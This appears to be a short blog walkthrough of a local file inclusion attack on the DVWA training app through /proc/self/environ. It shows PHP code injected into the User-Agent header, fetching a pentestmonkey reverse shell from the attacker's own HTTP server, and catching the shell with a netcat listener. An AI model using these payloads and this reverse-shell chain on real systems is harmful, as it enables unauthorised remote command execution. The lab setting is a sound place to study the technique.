LFI-Part2 "/proc/sef/environ"

The basics on older systems...

DVWA - Security Low
( Assumed, allow_url_include is SWITCHED ON)

User-Agent: <?system('ls');?>

User-Agent: <?php echo shell_exec('ls'); ?>

Ok so now specifically for the /proc/self/environ we can change modify the Useragent Header value to upload our file from our server.

To make sure this works well we will create a .txt version of the php file and upload that instead of the php file then in the script output the file to php so that our code will execute in the next part.

Our user agent will look similar to this. User-Agent: The php file is the php reverse shell found on Kali from pentest monkeys site.

 The file in Kali is found at /usr/share/webshells/php/php-reverse-shell.php We change the IP address and port number to suit our needs...

We setup a quick HTTP server (python -m SimpleHTTPServer 4444) Making sure that the port is DIFFERENT to the one in the php-reverse-shell.php file This is because we don't want to "wget" on the same port as our shell is being created.

Next we setup our listener on the port specified in the php-reverse-shell.php file liek so (nc -lvp PORTNUMBER)

Next we execute the our HTTP request with the modified useragent and we see the request for our php-reverse-shell file was found.

Finally we simple request the php-reverse-shell.php file from the webserver directly and we should see our shell returned to us.

No comments:

Post a Comment